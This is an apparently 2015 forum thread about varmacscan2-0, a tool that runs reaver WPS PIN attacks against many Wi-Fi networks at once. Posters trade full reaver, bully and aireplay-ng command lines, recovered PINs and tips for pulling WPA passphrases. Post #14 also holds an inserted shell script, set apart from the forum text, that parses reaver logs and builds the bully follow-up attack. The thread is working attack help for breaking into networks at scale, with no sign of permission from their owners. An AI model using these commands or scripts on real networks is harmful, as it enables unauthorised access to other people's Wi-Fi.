
Thread: Varmacscan2-0 an automatic multi-target reaver attack tool released

  1. #11
    Senior Member
    Join Date
    Jul 2013
    Posts
    800
    To brunoaduarte

    Thanks again for your input

    MTeams has been running tests on version 2-4 with three (3) computers running both Kali 2.0 and 1.10a in both hard drive and persistent USB installs. In only one (1) case did reaver not get the WPA key. We think the problem is with output from tee.

    We are considering dumping xterm and trying Eterm, as it is now available through Kali.

    To Laserman75

    MTeams has never tried association through aireplay-ng. What a nice idea. As you have reported it works better, we will give it a try and add for you a module allowing an association choice in the dropdown menus. However, we do run aireplay-ng -1 a lot with VMR-MDK without the -A in the reaver command line, because there is no way to keep aireplay-ng functioning if it does not get a response, which would in turn kill reaver function. Please comment on this point.

    We are aware of the hidden SSID matter, as this option was coded into VMR-MDK at users' request. However, varmacscan is really just a scanner and uses the BSSID, not the ESSID, so if wash then gives the name as (null) the program would use that as the ESSID. We cannot test this as we have no hidden ESSID targets. If you have such, please test this.


    MTeams
    Last edited by mmusket33; 2015-11-30 at 09:09 AM.

  2. #12
    Member
    Join Date
    Nov 2015
    Posts
    45
    OK mmusket33, it seems to happen more often here; I've got 6 PINs and no WPA.

    I thought the problem would be the same as the one reported in this link: https://code.google.com/p/reaver-wps/issues/detail?id=203 (Issue 203: Reaver finds PIN but not passphrase)

    So I tried to use "bully" to crack the WPA and it worked!

    Code:
    bully -b XX:XX:XX:XX:XX:XX -c 3 -B -v 2 -p 20863463
    Maybe another solution would be to auto-run bully instead of reaver at line 695, after the WPS PIN is found...

    Code:
    xterm -g 80x15-1+100 -T "reaver pin= $WPSPIN" -e "reaver -i $monitor -a -f -c $channel -b $bssid -r 2:15 -L -E -vvv -N -T 1 -t 20 -d 0 -x 30 --pin=$WPSPIN --mac=$VARMAC --session tmp/$bssid  2>&1 | tee VARMAC_LOGS/$bssid-$ssid-$DATEFILE-$PAD" &
    BTW: There's a small bug at line 708 of "varmacscan2-0.sh"

    Code:
    [+] echo -e " Standby while all ESSID Probe Data from airodump-ng is processed...."
    should be

    Code:
    echo -e "[+] Standby while all ESSID Probe Data from airodump-ng is processed...."
    Last edited by brunoaduarte; 2015-11-30 at 05:24 PM.

  3. #13
    Senior Member
    Join Date
    Jul 2013
    Posts
    800
    To: brunoaduarte

    MTeams has tried to duplicate and only found one instance where reaver did not write the WPA key to the log file. Again we think tee is terminating the process before reaver can write the file.

    We are just coding in the -A request by Laserman75 as we speak.

    MTeam

  4. #14
    Member
    Join Date
    Nov 2015
    Posts
    45
    mmusket33,

    As I now have the WPS PIN code, I manually loaded reaver (same line that is executed by varmacscan):

    Code:
    reaver -i wlan0mon -a -f -c 10 -b XX:XX:XX:XX:XX:XX -r 2:15 -L -E -vvv -N -T 1 -t 20 -d 0 -x 30 --pin=59133049
    Here's reaver output:

    http://pastebin.com/a7qJzV8t

    As you can see, no WPA key is found, so the problem really seems to be with "reaver", and not with "tee".

    FYI: varmacscan found this exact same PIN 3 times, so I don't believe it's a wrong-PIN problem.
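
    The PIN-found-but-no-passphrase outcome described in #12 and #14, and the bully fallback suggested for line 695 in #12, as an added shell example that is not code from varmacscan2-0.sh, reaver or bully: it parses a tee-captured reaver log for the "[+] WPS PIN: '...'" and "[+] WPA PSK: '...'" lines reaver prints, classifies the run (key / PIN only / nothing), and assembles the bully command quoted in #12 with the recovered PIN. The sample logs are constructed, the BSSID, channel and interface values are placeholders, and the trailing interface argument to bully is an assumption (the command quoted in #12 does not show it).

```sh
#!/bin/sh
# Added example, not code from varmacscan2-0.sh, reaver or bully.
# Classifies a reaver log captured via tee and builds the bully fallback
# command when reaver reported a WPS PIN but no WPA PSK.
# Assumed log line formats are reaver's own:
#   [+] WPS PIN: '12345670'
#   [+] WPA PSK: 'passphrase'

# Print the last WPS PIN reaver reported in log file $1 (empty if none).
reaver_pin() {
    sed -n "s/.*WPS PIN: '\([0-9]\{8\}\)'.*/\1/p" "$1" | tail -n 1
}

# Print the WPA PSK reaver reported in log file $1 (empty if none).
reaver_psk() {
    sed -n "s/.*WPA PSK: '\(.*\)'.*/\1/p" "$1" | tail -n 1
}

# Classify the run: key / pin-only (the issue 203 case) / none.
reaver_result() {
    if [ -n "$(reaver_psk "$1")" ]; then
        echo key
    elif [ -n "$(reaver_pin "$1")" ]; then
        echo pin-only
    else
        echo none
    fi
}

# Assemble the fallback from post #12 (bully -b <bssid> -c <ch> -B -v 2 -p <pin>)
# for a pin-only log. $1 log, $2 bssid, $3 channel, $4 monitor interface
# (interface argument is an assumption; the quoted command did not show it).
# Returns 1 when the log holds no PIN, so a wrapper can skip the fallback.
bully_fallback_cmd() {
    pin=$(reaver_pin "$1")
    [ -n "$pin" ] || return 1
    echo "bully -b $2 -c $3 -B -v 2 -p $pin $4"
}

# Constructed sample logs (not real captures) for the two outcomes,
# written to $1/pin_only.log and $1/key.log.
write_sample_logs() {
    cat > "$1/pin_only.log" <<'EOF'
[+] Trying pin "59133049"
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Pin cracked in 14 seconds
[+] WPS PIN: '59133049'
EOF
    cat > "$1/key.log" <<'EOF'
[+] Received M7 message
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: '20863463'
[+] WPA PSK: 'ConstructedPassphrase'
[+] AP SSID: 'ConstructedNet'
EOF
}

# Demo: walk both constructed logs and show what a wrapper would do next.
demo() {
    dir=$(mktemp -d)
    write_sample_logs "$dir"
    for log in "$dir/pin_only.log" "$dir/key.log"; do
        case $(reaver_result "$log") in
            key)      echo "$log: WPA PSK '$(reaver_psk "$log")' recovered" ;;
            pin-only) echo "$log: PIN only, next: $(bully_fallback_cmd "$log" XX:XX:XX:XX:XX:XX 10 wlan0mon)" ;;
            none)     echo "$log: nothing recovered" ;;
        esac
    done
    rm -r "$dir"
}

demo
```

    A wrapper that runs the reaver line from line 695 can call reaver_result on the tee output after reaver exits and only launch bully for the pin-only case, so a run that already yielded the WPA PSK is not attacked twice.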

  5. #15
    Senior Member
    Join Date
    Jul 2013
    Posts
    800
    To brunoaduarte

    Thanks for your independent analysis. We will release version 2.6 within 24 hours, as the program has been running on three computers with both Kali 1.1 and 2.0. We switched to Eterm but could not get it to run under Kali 2.0, so we restored xterm. Furthermore, Laserman75's idea of using aireplay-ng and -A with reaver seems to work, as it cracked one network that had never even responded to a reaver PIN request in over a year.

    Again Thanks

    MTeams

  6. #16
    Junior Member
    Join Date
    Aug 2015
    Posts
    5
    Which network did Laserman get it to work on?
    Which router model?
    Please specify.

  7. #17
    Member
    Join Date
    Nov 2015
    Posts
    45
    Nice mmusket33,

    Hoping to see the new version of your script... also I'll try to use aireplay-ng auth here and see if I can crack the WPA passphrase.

    BTW, could you remove those confirmation texts (for every action there's a confirmation) from varmacscan2-0.sh?

    Other features that would be cool to have:
    - Ignore low signal APs
    - Attack by signal level (start with stronger signal AP)
    Last edited by brunoaduarte; 2015-12-03 at 04:39 AM.

  8. #18
    Junior Member
    Join Date
    Apr 2015
    Posts
    29
    Quote Originally Posted by brunoaduarte View Post
    Nice mmusket33,

    Hoping to see the new version of your script... also I'll try to use aireplay-ng auth here and see if I can crack the WPA passphrase.
    No, aireplay-ng auth is only there so that the association is not carried out by Reaver, because that fails on some routers.
    This has nothing to do with the WPA passphrase.

    @mmusket33
    I hope that soon the new version available for testing

  9. #19
    Member
    Join Date
    Nov 2015
    Posts
    45
    Quote Originally Posted by Laserman75 View Post
    No, aireplay-ng auth is only there so that the association is not carried out by Reaver, because that fails on some routers.
    This has nothing to do with the WPA passphrase.
    Yeah Laserman75, I know aireplay-ng will not crack the WPA pass. What I meant is that I was going to try aireplay-ng to do the auth/association process for reaver (reaver -A flag), because I was having some problems cracking the WPA pass after the PIN code was found (reaver only found the WPS PIN, and no WPA pass), as you can see in my last log...

    Anyway, your idea worked! Not with reaver, but with "bully"...

    I started aireplay-ng auth/association and started bully with fixed pincode, wpa passphrase was recovered in seconds.

    Thanks !
    Last edited by brunoaduarte; 2015-12-03 at 04:28 AM.

  10. #20
    Junior Member
    Join Date
    Apr 2015
    Posts
    29
    @brunoaduarte
    No need to thank me, you're welcome.
    Nice to hear that it works for you.
